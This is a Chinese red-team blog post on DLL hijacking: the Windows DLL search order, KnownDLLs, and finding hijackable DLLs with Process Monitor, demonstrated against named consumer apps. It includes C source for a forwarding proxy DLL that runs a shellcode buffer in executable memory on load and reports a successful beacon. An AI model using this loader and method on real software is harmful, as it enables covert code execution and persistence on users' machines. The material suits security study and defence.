前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >无处不在的dll劫持

无处不在的dll劫持

原创
作者头像
红队蓝军
发布2022-05-04 14:30:26
5360
发布2022-05-04 14:30:26
举报
文章被收录于专栏:红队蓝军红队蓝军

前言

dll劫持是比较经典,也是比较老的技术,但到目前位置依然能用。

具体原理就是某些exe需要加载dll,而查找dll的目录顺序如下:

•应用程序所在目录;

•系统目录SYSTEM32目录;

•16位系统目录即SYSTEM 目录。该项只是为了向前兼容的处理,可以不考虑;

•Windows目录。通常是C:\Windows;

•加载 DLL 时所在的当前目录;

•环境变量PATH中所有目录。需要注意的是,这里不包括App Paths注册表项指定的应用程序路径。

所以如果一个dll不在应用程序所在目录,那么我们可以在应用程序所在目录放一个我们自己的dll,名称改为要加载dll的名称,这样当程序启动时,程序会加载我们自己的dll。当然这里只是简单的说了一种情况,某些情况下,即便正常dll存在,我们也可以通过dll劫持转发的方式劫持,目前不少厂商已经通过hash,MD5校验或数字签名验证等方式确保加载的dll为自己的dll,这会是即便你找到了相关可利用的dll劫持但还是失败的原因之一。

Windows 7之后:

微软为了更进一步的防御系统的DLL被劫持,将一些容易被劫持的系统DLL写进了一个注册表项中,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用。注册表路径如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

本机win11的knownDLLs

分析一个应用程序是否存在劫持系统DLL的漏洞,通常需要几个步骤:

1.启动应用程序

2.使用Process Monitor等类似软件查看该应用程序启动后加载的动态链接库。

3.从该应用程序已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。

4.编写从上一步获取到的DLL的劫持DLL。

5.将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。

劫持不存在的DLL

最近游戏玩的比较多,用开黑啦试一下

使用process Monitor Filter对kaiheila.exe进程进行监控

发现在kaiheila.exe目录下对一个不存在的dll进行QueryOpen操作

查看栈发现也确实有loadlibrary操作

我们自己编译一个最简单的dll

将生成后的dll移到kaihela.exe目录下

然后将名称改为powrprof.dll

重新启动开黑啦,证明确实存在dll劫持。

劫持已经存在的DLL

这里找到一个成功加载的

这里先把原来程序正常的dll改名为libEGL1.dll,然后将我们自己的dll改名为libEGL.dll

然后再重新执行程序,这里同样是弹出了窗口

转发式劫持

能够成功劫持,但劫持后影响正常程序运行

基本原理如下:

这里可以使用工具AheadLib

使用生成的cpp文件编译,将原来的dll改名为voice_helperOrg.dll

生成一个64位的payload

#include <Windows.h> #include <stdlib.h> #pragma comment(linker, "/EXPORT:RegisterHookListener=voice_helperOrg.RegisterHookListener,@1") #pragma comment(linker, "/EXPORT:RemoveAllListeners=voice_helperOrg.RemoveAllListeners,@2") #pragma comment(linker, "/EXPORT:StartHelperService=voice_helperOrg.StartHelperService,@3") #pragma comment(linker, "/EXPORT:StopHelperService=voice_helperOrg.StopHelperService,@4") HANDLE hThread = NULL; typedef void(__stdcall* JMP_SHELLCODE)(); /* length: 894 bytes */ unsigned char shellcode[] = "SHELLCODE"; DWORD WINAPI jmp_shellcode(LPVOID pPara) { LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(lpBase, shellcode, sizeof(shellcode)); JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase; jmp_shellcode(); return 0; } BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0); } else if (dwReason == DLL_PROCESS_DETACH) { } return TRUE; }

uu语音上线

目前wx最新版仍然有相同的问题

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档